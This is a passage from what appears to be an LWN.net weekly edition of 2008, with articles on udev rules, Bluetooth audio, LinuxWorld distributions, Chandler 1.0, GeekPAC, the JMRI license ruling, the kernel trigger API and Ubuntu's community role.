of the devices on the market, currently.  That should be a relatively small
piece of the puzzle, though; chances are good that this patch set will be
in shape for inclusion into 2.6.28.

		Udev rules and the management of the plumbing layer


Once upon a time, a Linux distribution would be installed with a
/dev directory fully populated with device files.  Most of them
represented hardware which would never be present on the installed system,
but they needed to be there just in case.  Toward the end of this era, it
was not uncommon to find systems with around 20,000 special files in
/dev, and the number continued to grow.  This scheme was unwieldy
at best, and the growing number of hotpluggable devices (and devices in
general) threatened to make the whole structure collapse under its own
weight.  Something, clearly, needed to be done.

For a little while, it seemed like that something might be devfs, but that
story did not end well.  The
real solution to the /dev mess turned 
out to be a tool called "udev," originally written by Greg Kroah-Hartman.
Udev would respond to device addition and removal events from the kernel,
creating and removing special files in /dev.  Over time, udev
gained more powerful features, such as the ability to run external programs
which would help to create persistent names for transient devices.  Udev is
now a key component in almost all Linux systems.  It's like the plumbing in
a house; most people never notice it until it breaks.  Then they realize
how important a component it really is.


Udev is configured via a set of rules, found under
/etc/udev/rules.d on most systems.  These rules specify how
devices should be named, what their ownership and permissions should be,
which kernel modules should be loaded, which programs should be run, and so
on.  The udev rule set also allows distributors and system administrators
to tweak the system's device-related behavior to match local needs and
taste.

Or maybe not.  Udev maintainer Kay Sievers has recently let it be known that he would like all
distributors to be using the set of udev rules shipped with the program
itself.  Says Kay:


	 We should all unify as far as possible.  Red Hat, SUSE and Gentoo
	 are already using the same rules files, with a minimal rules set
	 on top, in a distro specific file. We ask the rest of the universe
	 to join us, and do the same.


This request was surprising to some.  A Linux system is full of utilities
with configuration files under /etc; there is not normally a push
for all distributions to use the same ones.  So why should all distributors
use the same udev rules?  The reasoning here would
appear to come down to these points:


 The udev rules files are not really configuration files - they are,
     instead, code written in a domain-specific language.  For a
     distributor to change those files is akin to patching the underlying C
     code; far from unheard of, but generally seen as being undesirable.
     As a way of underscoring this point, the udev developers are moving
     the udev rules out of /etc and into /lib.

 There is little reason for distributors to differentiate themselves
     based on their device naming schemes, and every reason to have all
     Linux systems use the same device names.  For the situations where
     reasonable distributions may still differ - which group should own a
     device, for example - there is a mechanism to add distributor-specific
     rules.

 Increasingly, other packages will depend on a specific udev setup for
     the underlying system.  Distributors which use their own rules will
     have a harder time making these new tools work right.


That last point refers, in particular, to DeviceKit, a
set of tools designed to make the management of devices easier.  Between
them, udev and DeviceKit are being positioned to replace most of the
functionality in the much-maligned hal utility.  See this
posting from David Zeuthen for lots more information on DeviceKit and
the migration away from hal in general.

The only problem is that some distributors aren't playing along.  Marco
d'Itri, the Debian udev maintainer, responded that a common set of udev rules is
"not going to happen."  The default rules, he says, do not meet Debian's
need to support older kernels, and, besides, "I consider my rules
much more readable and elegant than yours".  Ubuntu maintainer Scott
James Remnant is also reluctant to use the
default rules.

Scott appears to be willing to consider a change to the default rules if it
can be made to work right; Marco, instead, seems determined to hold out.
When encouraged to send patches to improve the default rules (and make them
more elegant), he responded:


	Tell me what's missing from my rules instead, I will fix it and
	then you will be able to use them. If nothing is missing, then you
	can replace the files right now.


It appears likely that most of the distributors will come to see the udev
rules as code which is to be maintained upstream; even Debian may come
along eventually.  As this happens, the layer of "plumbing" which sits just
on top of the kernel should be worked into better shape.  Kernel developers
may find themselves involved in this process; David has posted a proposal that all new kernel subsystems,
before being merged, must be provided with a set of udev rules.  That would
help the udev developers get a set of default rules into shape before the
distributors feel the need to step in to make things work.

Increasingly, the operation of the kernel is being tied to a set of
low-level user-space applications; there is not much which can be done with
a bare kernel.  How all of this low-level plumbing should work, and how it
should interoperate with the kernel, is still being worked out. The
management of udev
policies is just one of the outstanding issues.  So the
upcoming Linux Plumbers
Conference would seem to be well timed; there's a lot to talk about.

		OLS: Audio Streaming over Bluetooth


On July 23 Marcel Holtmann delivered a presentation on the state of

Audio Streaming over Bluetooth
at the 2008 Linux Symposium in Ottawa.
Holtmann's background involves working on improving Linux Bluetooth
audio support for laptops and embedded systems such as cell phones.


Marcel expressed frustration with the complexity of the Bluetooth specifications 
which include approximately 20 protocols and 40 profiles.  Profiles include things like
mono headsets, in-car usage and high quality stereo headphones.  There are protocols
for serial device emulation, phone book access, caller ID information, text messaging and
multiple options for audio and video.


Bluetooth defines separate protocols for streaming and control, such as skipping tracks,
seeking within tracks, and displaying
ID3
information.  Having these aspects split into different
protocols was called "messy" because they are always used together.


Mono headsets are supported by the Synchronous Connection Oriented link (SCO), while 
the Advanced Audio Distribution Profile (A2DP) is designed for high quality stereo audio.
For audio compression Bluetooth defines a royalty-free SubBand-Codec (SBC) to avoid 
fees for use of common codecs like MP3 and AAC.  All A2DP devices must support
SBC, but many also support decoding MP3 and AAC as well.
Linux's SBC support was initially very poor, but some developers from the Instituto Nokia de Tecnologia in Brazil stepped up to improve encoding and now the the LGPL SBC 
implementation rivals some of the
best commercial implementations.


Early Bluetooth headset support in Linux involved copying all the audio data over
sockets from the application to the Bluetooth daemon.  The daemon would then copy the
data again to the device, causing unnecessary CPU usage and increasing latency.  The current
design works by setting up channels and connecting external applications directly
to the device sockets.  Marcel also mentioned investigating 
a shared memory approach for better performance at the cost of some extra complexity.


Adding support for a Bluetooth audio device is
quite different than for standard audio hardware — compressed data must be sent directly to the
devices, possibly with ID3 and other information.  If the audio being played is in a format
that a device does not support it must be decoded and re-encoded first.  Bluetooth devices will also
appear and disappear while audio is being played.


Marcel on
ALSA:
"I won't touch it anymore."  ALSA's primary failing is that it wasn't designed
to support virtual devices.
He is also not convinced that the current direction of PulseAudio is suitable for
Bluetooth audio, in particular there is no support for
changing codecs while audio is being sent to a device.
GStreamer,
however can support the concept of virtual devices, sending
out encoded data and sending ID3 information when required.
If a file format is supported by a Bluetooth device,
GStreamer can easily be told to send it as-is without re-encoding it.
It can also handle the passing off of the encoding and decoding tasks
to special hardware, which is commonly required for embedded systems.


Future work includes adding more intelligence to the handling of
control signals.
When the user presses Pause and there are multiple devices and streams 
active, which stream should be affected?
The current implementation applies the action to all streams,
but it may be better to be able to tell which control device is
associated with which stream.  


There is also ongoing work to support new hardware.
Marcel has had some issues with headsets that are very sensitive
to timing, but don't provide enough timing information to reliably
fix.  There have also been some problems supporting
"Enhanced" Synchronous Connection-oriented (eSCO) Links
due to vendors that are unwilling to cooperate with the developers.


For more information on Bluetooth development see Marcel's OLS Paper [pdf] and
BlueZ.org, the site for the
official Linux Bluetooth protocol stack.


		Distributions at LinuxWorld 2008


I went to LinuxWorld last week primarily to lead a Birds of a Feather
discussion, the title of which was "Which Linux Distribution is Right for
Me?"  It seemed to be generally well received, though a few people left
early after it became clear that there were no flashy slides, nor was I
going to reveal the "One True Linux Distribution".  I don't believe there
is one true distribution, just as there is no one true use for Linux.  So I
pointed people to The List and we talked
about a few distributions that might meet some specific needs that people
had.
<!-- LWNNoRightSideAd -->

There was plenty of time left over to walk around the Expo, looking for
distribution booths on the show floor.  Oracle had a big booth to the right
of the entrance.  Access was on the other side.  

The Linux Garage was an interesting place, full of various embedded
devices.  Did you know that the Open Moko phones are currently available
with three versions of its OS?  Version 2007.2 is the oldest.  It uses gtk
and supports caller dialing contacts.  The ASU 2008.8 OS is based on Qt.
The latest and greatest Open Moko system is the FSO (FreeSmartphone.Org)
which makes use of gtk, Qt and Python.  Next up will be a version using
Trolltech's Qtopia for the GreenPhone.
The NSLU2 comes with Debian or OpenWRT.  OpenWRT is also used in the FON
wireless router and the Meraki wireless router.  The later can be managed
via a web interface.  OpenWRT will also run on ASUS WL520GU and the Gateway
Avila, but it is not installed by default.


Canonical had a large booth.  In half they were showing off Netbooks, with
the Ubuntu remix for the Netbook.  The other half had various business
partners showing off the software packages that were available on Ubuntu.
Ubuntu was also the distribution of choice at the Installfest.  Xubuntu was
used on the really low memory machines.  Untangle was a major sponsor of
the Installfest.


Linpus and gOS has crowded booths, so I didn't get very close.  I did find
some pictures from the gOS
booth.  Fedora and openSUSE had booths in the .org pavilion, where I
stopped for a quick chat but didn't get any pictures.  Fedora had computers
from Shuttle, with Fedora pre-installed.  openSUSE's mlasars had this to say about LWE
2008.  Linux Magazine's Joe Casad interviewed
Fedora's Karsten Wade (video) and Karsten had
some reflections on his blog.  I also stopped at the Vyatta booth.  I
reviewed Vyatta briefly several years ago, but at that time the distribution
didn't do DHCP protocol.  The new version of Vyatta does DHCP, VPN and lots
of other things.  Vyatta recently announced
a firewall/router product that they plan to start shipping in a few weeks.


Foresight joined up with Shuttle Computers at their booth.  Small and quiet
Shuttle computers were also at the Fedora booth.  Shuttle will install
Foresight or Fedora (and probably other distributions) if you like.
Foresight is based on rPath and has been known for closely following the
GNOME desktop.  It seems that Foresight is now planning on a KDE
edition.


		Chandler finally reaches a 1.0 release


The Chandler project has been
around since 2001, periodically releasing new versions of its personal
information management (PIM) tool, but never quite reaching the 1.0
milestone—until now.  Over that time, Chandler has undergone various
major revisions of both code and philosophy, while the rest of software
industry has hardly been standing still.  Whether Chandler is relevant or
important going forward is an open question, but it does have some
interesting ideas as well as potentially useful code.


Chandler is the brainchild of Mitch Kapor, of Lotus 1-2-3 fame, who started
the project as part of his Open
Source Applications Foundation (OSAF).  Kapor and others have funded
OSAF to work on Chandler over the last seven years, but in January all that
changed.  Kapor
announced that he was leaving the board and only continuing to finance
Chandler until the end of 2008.  The 1.0
release is to some extent a "last gasp" attempt to build a community of
users and 
developers to continue Chandler development down the road.


Since the time when Chandler was originally envisioned as a shareable
calendar and 
information manager, many other, similar tools have come about.  Evolution
is a free software example, while Google Calendar is popular, but
proprietary and closed.  Neither of those cover the full feature spectrum that
Chandler aspires to, but they have been available for quite some time.


The idea behind Chandler will be familiar to those who know about the
Getting Things Done system.  Organizing and integrating to-do lists,
calendar events, email, and notes into a single system—and single
application—is the driving force.  These items (known as "notes") can
be tagged into various
collections (like Home, Work, etc.), assigned as events in the calendar, or
mailed to others. 


The calendar works like one would expect.  Events have the standard fields:
start/end time, frequency for recurring events, various alarm options, etc.
Events get color-coded based on their collection and the calendar itself
can be viewed at various granularities: day, week, or month.  Based on
their proximity in time, as well as user choice, events get "triaged" into
categories of "Done", "Now", or "Later".


There are multiple synchronization options available with Chandler.
Keeping calendars in sync amongst multiple different systems, with
different import/export formats is clearly something that the Chandler team
focused on.  Because Chandler is cross-platform—written in Python and
available on Linux, OS X, and Windows—it can interface both with tools
that run on those platforms as well as with internet services like Google
Calendar.  As yet there is no Outlook/Exchange synchronization available
which leaves out a rather large portion of the potential audience one would
guess. 


The Chandler desktop is only one of two pieces of the Chandler project;
the other is the Chandler
server.  It is the means to share Chandler 
information, either with other users or just with other computers.  Data
can be synchronized to the server, then retrieved on another Chandler desktop
elsewhere.  For those that do not want to run their own server, the project
runs a version of the server as the Chandler hub, which offers free
accounts. 


The 1.0 release looks like a solid tool.  It has some enthusiastic
users, but will that translate to a larger development community?
Chandler development has always been directed—and funded—by the
OSAF, so it suffers from a smaller development community than it might have
otherwise.  


Projects that start as proprietary, but then open their code, sometimes
have difficulties allowing a community to influence or control the
direction of that code thereafter.  We
have seen that with OpenSolaris and other projects.  Chandler seems to
suffer from some of those same problems, even though it came about differently.
By removing the funding, Kapor may well have jump started Chandler
development. 


Seven years is a long time by any standard, but for software, it is an
eternity.  By keeping a relatively tight grip on the direction of the
project, the OSAF may well have kept interested folks who were not on their
payroll from getting involved.  If the project can move to a more open style,
with frequent releases, it may be able to regain some of that lost time.
It is an intriguing tool, but it is way behind schedule.


		GeekPAC to fight for information rights


There's little question that plenty of people are annoyed at how
difficult it is to rip movies from legally purchased DVDs into formats
readable by handheld devices or media players. The lack of consistency in
document formats is an ongoing headache for anyone who receives files
that are only readable with certain software. Information rights management
has become enough of a frustration that a group has formed specifically to
deal with the problem head on. GeekPAC is a political action
committee made up of volunteers who are taking their complaints straight to
Capitol Hill. 

Last year California Assemblyman Mark Leno authored AB
1668, a bill designed to encourage the state to adopt the Open Document
Format as the standard format for government documents. Not
surprisingly, Microsoft came out against the bill and it was eventually
struck down in committee. CollabNet Community Manager and longtime FOSS
supporter John Mark Walker was angry. Realizing that the open source
community had no voice during the hearings and no way to fight back against
the opposition's lobbyists, Walker decided to mobilize support from within
the ranks of the FOSS community and let them do what they do best —
rally behind a cause and prove once again that there's strength in
numbers. So he founded GeekPAC. 

GeekPAC's goal is to pull together enough funding — a
mere $2,200 — to file the necessary paperwork to be formally
recognized by the Federal Elections Committee as a Political Action
Committee (PAC). Then the group will locate politicians or candidates in
the House and Senate who support hot-button technology issues like
copyright reform and net neutrality. Once identified, GeekPAC will help
support their campaigns and lobby together for change. 

"If all we do is fund some campaigns, create a few attack ads, and do
the occasional lobbying, I'll be pretty disappointed," says Walker. "The
real goal here is to educate people as to why they should care. Frankly,
those of us who care about our rights in the information age have done a
really poor job of communicating the importance or relevance." 

Indeed, Walker suggests that ambiguous verbiage and a lack of
communication with people outside the tech industry has been the biggest
hindrance to effecting large-scale change. "One of the problems is that we
insist on using terms like 'digital rights,' the usage of which basically
leaves out a large percentage of the population. Most people don't know
what that means, and they assume that digital doesn't include them, because
they don't work in the tech industry and have little contact with people
who do. So lots of digerati swing around their proverbial phalli and talk
'digital rights' this and 'DRM' that, and it becomes a kind of high-tech
circle jerk that is constraining and ultimately self-limiting." 

A better approach, he says, would be to frame these important issues as
"information rights." Once people realize that the bills politicians are
voting on aren't about obscure concepts but rather affect human rights at a
basic level, Walker is confident GeekPAC will make great strides toward
changing minds at the national level. 

"It's really about the free flow of information and letting free
markets do their job. Once you start there, it's a quick hop and a skip
down the path of the founding principles of this great country," explains
Walker. He goes on to note that these issues affect people at every
socio-economic level, from patents that limit free market trade, to
"information restrictions that affect our ability to adequately educate the
public."  

Walker asserts that without a total overhaul of the United States patent
and copyright laws, the information divide will never narrow, and
ultimately lead to larger problems down the road. "It's really about
education, innovation, and reducing the bar to entry so that America can
remain competitive in the 21st century." 

One of the overriding reasons Walker chose to launch GeekPAC now is
because this is an important election year and political issues are on the
minds of many. Though he acknowledges people have been discussing these
topics for years, talking just isn't enough.  

"In the 10 years that have passed since the DMCA, we still haven't been
able to mount a credible reform effort, and countless horrible things have
taken place on our watch that co-opt our so-called inalienable rights. We
must do more, and I can't think of a better time to do more than an
election year," he says. 

GeekPAC is taking a multi-faceted approach to locating politicians to
support. The group's supporters and volunteers are encouraged to recommend
candidates who they know believe in GeekPAC's goals and
direction. Politicians can also contact the group directly and asked to be
considered for backing from GeekPAC. Once chosen, candidates are asked to
sign a simple pledge promising
to "protect my constituents' fair use rights to information [and] support
the use of open standards in government for the storage and archiving of
public data." 

Walker says GeekPAC is most interested in helping candidates who take a
strong stance on open standards and open access, copyright reform, patent
reform, and net neutrality. "Obviously, we'll be most enthusiastic about
candidates who support all of those, but we will help campaign for
candidates who support at least one of those items." 

The name GeekPAC may ring a bell for those who have been around the FOSS
community for a while. A similar group was formed more than five years ago
but never quite got off the ground. Though the two organizations don't
share any common members, they do have the same goals — and an
affection for the domain name. Before GeekPAC morphed into its current
state, it was known as BytesFree — a similar group, but without the
political slant. Walker says he originally planned to stay with that name,
until he learned that the geek-pac.org domain was available, and then
everything fell into place. 

Walker formally launched GeekPAC at last week's LinuxWorld Expo by
hosting a Birds of a Feather get-together at the end of a long day of
sessions. While current and would-be volunteers strategized and planned,
Walker took a few minutes to share the group's vision with notable
columnist and FOSS supporter Doc Searls. 

Though GeekPAC's premise is strong, not everyone is convinced of its
viability. LinuxWorld community blogger Don Marti says
the idea is likely to fail, in part, because of a poor choice of names. He
claims the inclusion of the term "geek" is insulting and suggests it
doesn't relay the true goals of the group. 

"Creative Commons is a great name. Electronic Frontier Foundation is
pretty good," Marti suggests. "You have to get in some words that imply
that the people in the organization actually make something useful and that
the organization's goals are public goods. Network Growth and Productivity
Council?"  

Marti also notes that GeekPAC should include singers, podcasters, and
other sub-groups affected by information rights. Though the underlying
commonality among the members of GeekPAC is an understanding of how these
issues impact the FOSS community, Marti says that's not enough of a reason
to form a splinter group of nothing but techies. 

"There's a community that already exists around these issues — why
split off the subset of EFF supporters who happen to be into free
software?" asks Marti. "Of course EFF itself can't be involved because
they're tax-exempt, but the target is clearly the same people, and their
friends and colleagues. A 'free software users for DMCA reform' group would
be like 'cat owners for a balanced budget'." 

At the end of the day, it won't be the group's name or membership
demographic that decides GeekPAC's success. Walker says it will be "When
politicians and candidates start referencing us by name because our
influence is large enough to matter." 


		Why the JMRI decision matters


The Java Model Railroad
Interface (JMRI) project is not one to sit at the 
top of the Debian popularity contest results; it provides tools for model
railroad enthusiasts.  But the legal wrangling around JMRI has made it one
of the more important projects in our community at this time.  JMRI has
suffered some legal setbacks, but much of that was turned around by the US
Federal Circuit Court of Appeals on August 13.  The result is a
vindication for much of the legal reasoning behind free software licenses.


JMRI was charged with patent
infringement back in 2006.  As part of the legal counterattack, JMRI
developer Robert Jacobson charged patent holders Michael Katzer and Kamind
Associates, Inc. with copyright infringement for its use of JMRI code.  The
Federal District Court in this case had concluded that the terms of the
Artistic License were contract terms, and not condition on the copyright
license itself.  


That ruling was seen as a major setback.  The authors of free software
licenses have gone to great lengths to restrict themselves to copyright
licensing and to avoid contract law altogether.  There are a couple of
important reasons for this:


 A contract is only binding if all parties have voluntarily entered
     into it.  There have been mutterings from some corners for years that
     licenses like the GPL are not truly enforceable because the recipients
     of software under those licenses have never signed the relevant
     contracts.  Such mutterings have become relatively hard to hear, but
     they are still out there.  A software license is, 
     instead, a unilateral grant of privilege which does not require
     agreement.  As such, it should be easier to enforce.

 Violation of the terms of a contract sets up the guilty party to be
     sued for damages.  Copyright infringement, instead, allows for
     injunctive relief, allowing the copyright owner to immediately shut
     down the infringing activity.  Many of those who would ignore the
     terms of free software licenses fear injunctions far more than they
     fear suits for damages.


Both points are crucial.  If you look at clause 5 of the GNU General Public
License (version 2, in this case), you read:


	You are not required to accept this License, since you have not
	signed it.  However, nothing else grants you permission to modify
	or distribute the Program or its derivative works.  These actions
	are prohibited by law if you do not accept this License.


Anybody who distributes a copyrighted work will be doing so in violation of
the author's exclusive rights.  If a distributor has a license from the
owner, though, then this distributor has a legal defense.  The question
raised in this case was, in summary, this: if somebody distributes free
software without adhering to the terms of the license, does that somebody
still have a license at all?  The District Court ruled that this
person did, indeed, still have a license to distribute the software, though
they might be liable for damages for not having followed all of the terms.
The Appeals Court, instead, said that failure to hold to the conditions
meant that the license simply did not exist; distributing free software in
a manner contrary to its license is copyright infringement, not breach of
contract.

This decision was reached in a sufficiently high court that the
conversation should be finished in the United States; we now have a
high-level legal precedent that software licenses are licenses, and
that they can be enforced with injunctions.  In US-style law, precedents
are everything; the absence of a clear precedent always causes a certain
degree of legal uncertainty.   We now have that precedent; as a result,
anybody seeking to enforce a free software 
license in the US is now standing on firmer ground.

There are some other interesting conclusions to be drawn from this ruling.
Copyright law in the US does not recognize any sort of moral rights to
copyrighted works; it is, in classic American style, all about the
protection of economic rights.  Some have argued that, since free software
is, well, free of charge, there is no economic harm in violating its
licenses, and, thus, copyright law has nothing to say.  But the Appeals
Court saw things differently, stating that there was a clear economic
interest in the Artistic license:


	The clear language of the Artistic License creates conditions to
	protect the economic rights at issue in the granting of a public
	license. These conditions govern the rights to modify and
	distribute the computer programs and files included in the
	downloadable software package. The attribution and modification
	transparency requirements directly serve to drive traffic to the
	open source incubation page and to inform downstream users of the
	project, which is a significant economic goal of the copyright
	holder that the law will enforce. 


So the reasoning that free software licenses are unenforceable due to the
lack of an economic interest fails to hold water.  Similarly, the
interesting idea that free software license incompatibility does not really
exist, recently promoted on
LWN by Brian Cantrill, seems unlikely to stand up to serious scrutiny.


Some voices on the net have worried that this ruling could also give
sharper teeth to exploitive proprietary end user license agreements.  The
Electronic Frontier Foundation is one
example:


	While we're pleased to see a panel of learned judges endorse the
	legal foundations of the open source software paradigm, the
	decision may also encourage proprietary software vendors who
	frequently fill their "end user license agreements" with
	restrictions that are denominated as "conditions" on the license.
	
	If violating a "condition" in a EULA results in copyright
	infringement liability, what's to stop a software vendor from
	imposing conditions that are unrelated to copyright law (e.g. an
	agreement not to disparage the copyright owner, or to wear pink
	bunny ears on Tuesdays), or even antithetical to copyright law
	(e.g. a waiver of fair use rights)?


If this comes to pass, restrictions on reverse engineering, publication of
reviews, lack of bunny ears, etc. may, indeed, become easier to enforce.  Such an
outcome would not 
necessarily be a bad thing for users of free software, though.  If
anything, it will simply make the value of freedom that much more clear.


Finally, it is worth noting well that this outcome did not just happen on
its own.  Behind the scenes, concerned lawyers from groups like the
Stanford Center for Internet and Society and the Electronic Frontier
Foundation, who have understood all along what was at stake here, have
put in a great deal of work to get this ruling.  They were successful
despite the fact that the old Artistic License was not the strongest
position to be arguing from.  Many of us would prefer to
not have to think about legal issues much of the time.  But we should be
happy and grateful that some very capable people have been willing to put
in the effort to defend our rights in cases like this one.

(The full ruling is available in PDF format,
or in
plain text on Groklaw).

		Triggers: less busy busy-waiting


Kernel code must often wait for something to happen elsewhere in the
system.  The preferred way to wait is to use any of a number of interfaces
to wait queues, allowing the processor to perform other tasks in the mean
time.  If the kernel code in question is running in an atomic mode, though,
it cannot block, so the use of wait queues is not an option.
Traditionally, in such situations, the programmer simply must code a busy
wait which sits in a tight loop until the required event takes place.

Busy waits are always undesirable, but, in some situations, they become
even more so.  If the wait is going to be relatively long, it would be
better to put the processor into a lower power state.  After all, nobody
cares if it executes its empty loop at full speed, or, even, whether the
loop executes at all.  If the wait is running within a virtualized guest,
the situation can be even worse: by looping in the processor, a busy wait
can actively prevent the running of the code which will eventually provide
the event which is being waited for.  In a virtualized environment, it is
far better to simply suspend the virtual system altogether than to let it
busy wait.

Jeremy Fitzhardinge has proposed a solution to this problem in the form of
the trigger API.  A trigger
can be thought of as a special type of continuation intended for use in a
specific environment: situations where preemption is disabled and sleeping
is not possible, but where it is necessary to wait for an external event.


A trigger is set up in either of the two usual patterns:


There is a sequence of calls which must be made by code intending to
wait for a trigger:


Triggers are designed to be safe against race conditions, in that if a
trigger is fired after the trigger_reset() call, the subsequent
trigger_wait() call will return immediately.  As with any such
primitive, false "wakeups" are possible, so it is necessary to check for
the condition being waited for and wait again if need be.

Code which wishes to signal completion to a thread waiting on a trigger
need only make a call to:


This code should, of course, ensure that the waiting thread will see that
the resource it was waiting for is available before calling
trigger_kick().

A reader of the generic implementation of triggers may be forgiven for
wondering what the point is; most of the functions are empty, and
trigger_wait() turns into a call to cpu_relax().  In
other words, it's still a busy wait, just like before except that now it's
hidden behind a set of trigger functions.  The idea, of course, is that
better versions of these functions can be defined in architecture-specific
code.

If the target architecture is actually a virtual machine environment, for
example, a
trigger can simply suspend the execution of the machine altogether.  To
that end, there is a new set of paravirt_ops allowing hypervisors to
implement the trigger operations. 

Jeremy has also created an implementation for the x86 architecture which
uses the relatively new monitor and mwait instructions.
In this implementation, a trigger is a simple integer variable.  A call to
trigger_reset() turns into a monitor instruction,
informing the processor that it should watch out for changes to that
integer variable.  The mwait instruction built into
trigger_wait() halts the processor until the monitored variable is
written to.  No more busy waiting is required.

There is a certain elegance to the monitor/mwait
implementation, but Arjan van de Ven worries that it may prove to be too slow.  So
changes to the x86 implementation are possible.  There have not been a lot
of comments about the API itself, though, so the trigger functions may well
make it into the mainline in something close to their current form.

		In defense of Ubuntu


Criticisms of the Ubuntu distribution and Canonical, its corporate
sponsor, are not hard to come by.  Depending on who is speaking, Ubuntu and
Canonical are guilty of profiting from the free software community without
giving back to it, forking important projects or distributions,
legitimizing the use of binary-only system components, and more.  Of all of
these gripes, it is the "contributing to the community" complaint which is
heard most.  If one believes these complaints, Ubuntu is a parasitic
operation which does not understand how the community works and which is
harmful to the community as a whole.

Your editor would like to submit that these charges are overblown.  Ubuntu
is far from perfect, and it could certainly give back more than it does,
but Ubuntu does not deserve the level of opprobrium it is receiving from
certain parts of our community.


It is interesting to note that there appears to be a special place for
distributors among those who would criticize.  Red Hat, it has been said,
drives things toward its own profit and has, in the past, pushed far too
much bleeding-edge software on its long-suffering users.  Fedora is accused
of remaining insufficiently open, excessively bleeding-edge, and refusing
to make the watching of flash videos just work.  Novell/SUSE has done a
deal with the devil.  Debian, we are told, is simultaneously too chaotic
and too bureaucratic, and it can never get a release out on time.  Some
charge that Gentoo's community is dysfunctional, and that, in any case, it's
made up of people with too much time on their hands.  And Ubuntu stands
accused of taking the
work of others while failing to give back to or even credit the community
from which draws its software.


It is not surprising that distributors are specially blessed with this sort
of criticism.  Most free software users never deal directly with the
upstream projects which create the software they use.  Instead, they get it
all from a single middleman - the distributor.  So the distributor has a
great deal of influence over what kind of experience those users
have; the distributor is also the obvious guilty party when things seem to
go wrong.  Lots of people have opinions about their distributor, but they
know little about the projects that actually develop their software.

That said, much of the criticism of Ubuntu is coming from the developer
community, which does have a more detailed view of the full
ecosystem.  It is worth thinking about why that might be.  While Ubuntu's
contributions may not be as high as one might like, they are most certainly
not zero.  There are Ubuntu developers who are Debian developers, X.org
developers, GNOME developers, and so on.  If this page is to
be believed, Ubuntu developers are also contributing to the HURD.  The page
does not say why, sorry.

The developers who castigate Ubuntu are uniformly silent about the number
of kernel patches coming from the Mandriva camp.  They have nothing to say
about how much Xandros gives back to Debian.  Nobody totals up
contributions from Gentoo.  There are no complaints about Slackware's
presence in the community.  Arch Linux developers do not hear that they are
not doing enough.  There are no high-profile articles on how rPath is
taking advantage of free software developers.  Yet Ubuntu's contributions
most likely exceed those from all of the distributions named here, with the
possible (but far from certain) exception of Gentoo.  Ubuntu, it would
seem, is being held to a higher standard than many of its peers.

One reason for Ubuntu's special treatment must certainly be its nature as
the cool kid who showed up out of nowhere.  Sudden success can breed a
certain amount of animosity, especially when much of that success is
perceived to be built on the work of others.  It is a rare distribution
list which has not seen the occasional "I'm tired of your distribution, I'm
moving to Ubuntu now" message; that kind of stuff gets old after a while.
And when something gets old and irritating, it's tempting to respond in a
short-tempered way.


But the real reason must be elsewhere: Ubuntu has overtly set itself up to be
held to a higher standard.  It has been positioned as a strongly
community-oriented distribution with the mission of saving the world for
free software.  Debian-derived distributions which make less noise about
community - Xandros, say - receive less grief for their lack of
participation in the community.  Nobody expects anything from them, so
nobody complains.  But people do expect something different from
Ubuntu; it's supposed to be a part of our community.  So when it seems that
Ubuntu is not contributing patches upstream or that it's maintaining
forks of important software components, and when tools like Launchpad remain
proprietary, it feels like a promise has not been kept.


There is no doubt that Ubuntu could do better than it has.  But we should
not lose track of what Ubuntu has done.  Ubuntu has created a
distribution which appeals to a whole new class of Linux users.  The fact
that much of this work was done elsewhere notwithstanding, Ubuntu has shown
that a Linux system can wear a friendlier, easier-to-use face.  In the
process, it has made Debian suitable for a larger class of users.
Ubuntu has shown that a Debian-based distribution can make regular, stable
releases and still ship contemporary software.
Ubuntu has lived up to
its promises of support, including providing top-quality security
support.  And all of this is happening in a
way that, we are told, should become commercially self-sustaining at some
point.


On top of all this, Ubuntu employs a number of developers who work within
the community.  Yes, it would be a good thing if there were more of these
developers.  It would also be good if more fixes and enhancements escaped
Ubuntu's repositories and made it back upstream.  Ongoing encouragement at
all levels should help to make this happen.  But, as we encourage Ubuntu to
live up to its ambitious goals of being a full member of our community, we
should not lose our perspective.  We are, beyond doubt, richer as a result
of Ubuntu's existence.

		Desktop talks from LinuxWorld 2008 Conference


The LinuxWorld 2008 (August 4 - 7) Conference program
had plenty of talks that sounded interesting.  Unfortunately I only found
time to attend two talks, both from the Desktop Linux Track.

The first was from John Walicki, Open Client Architect at IBM who presented
"Desktop Linux Architects Speak Out".  The second was from Don Hardaway and
Craig Van Slyke, professors at John Cook School of Business and Saint Louis
University, respectively who entitled their talk "Open Source on the
Desktop: Why Not?".

Their were a couple of common themes in both of these talks.  First was
that Linux is ready for the general desktop.  The second was that the
desktop effects of Compiz and similar technologies are vital for attracting
people to the Linux desktop.  Wobbly windows may not be very useful in
practice, but putting a presentation on a cube can be effective.  Mostly
though it's the "wow factor" that gets people's attention.

In many cases, open source applications are just as good as, or better than,
their proprietary counterparts.  Don and Craig did a study in
which they asked university business
students to recreate documents and spreadsheets that they had previously
done using MS Office.   Twenty-eight of 28 students thought that it was
just as easy to produce documents of equal quality with OOo Writer.  OOo
Calc was similarly approved by 26 of the 28 students.

There were areas where John Walicki thought Linux needed improvement.
Accessibility, making computers useful for people with disabilities, is an
important area, as is power management, making computing greener by using
less electricity.

Linux is greener when it comes to keeping old hardware working longer.
One big plus is collaboration, getting KDE applications to
run seamlessly on GNOME  and vice versa, or when multiple distributions adopt
a single tool (upstart, PackageKit, etc.).  The collaboration enables
the tools to become much better, much faster.

John's assessment of the State of Linux Desktop is that it is growing, with
hot products that are making rapid changes.
Preloads are well established, and Linux
is the hottest technology in emerging markets, appliances, and green
computing.  His forecast is for steady growth.

Don Hardaway and Craig Van Slyke had a different perspective as academics.
They study people, and looked at why people choose one technology over
another.  Don presented the '3 leg stool' model for acceptance of
technology.  There are the 'tech leg', the 'people leg' and the
'organizational leg'.  The open source tech leg gets the most attention,
and the organizational leg is getting better, but the people leg has been
neglected.

The first thing about getting people to try new technologies is to realize
that people resist change.  However the perception of risk is relative to
their knowledge.  Those of us that use open source technology on a regular
basis are comfortable with it, but for those who don't know anything about
it there is a perceived risk that makes them reluctant to try it.  If they
learn more about open source the perception of risk is reduced.

There are stages in technology adoption.  First people must be aware that
it exists.  Then something about it must attract their interest.  Once that
happens they are more willing to evaluate the technology.  If the
evaluation is favorable, they will try it out.

Many of Don and Craig's students had never heard of Linux.  Once they had
heard, things like the desktop effects of Compiz got their interest.  Some
began to evaluate Linux, and some are probably still using it.

To gain the relative advantage, Linux must be better than the competition.
Linux costs less and is virus free, but, in the absence of a good image,
people will be 
reluctant to try it.  Craig thought gOS had a good image, but the
ease-of-use was not there in all cases.  Wireless, streaming media and some
applications were difficult for him to get going.  Craig found the EeePC
with Xandros was very easy to use and he got everything going without
resorting to the command line.  He thinks the Netbooks will give Linux
another boost.

So the average user might find sharper graphics appealing, but if things
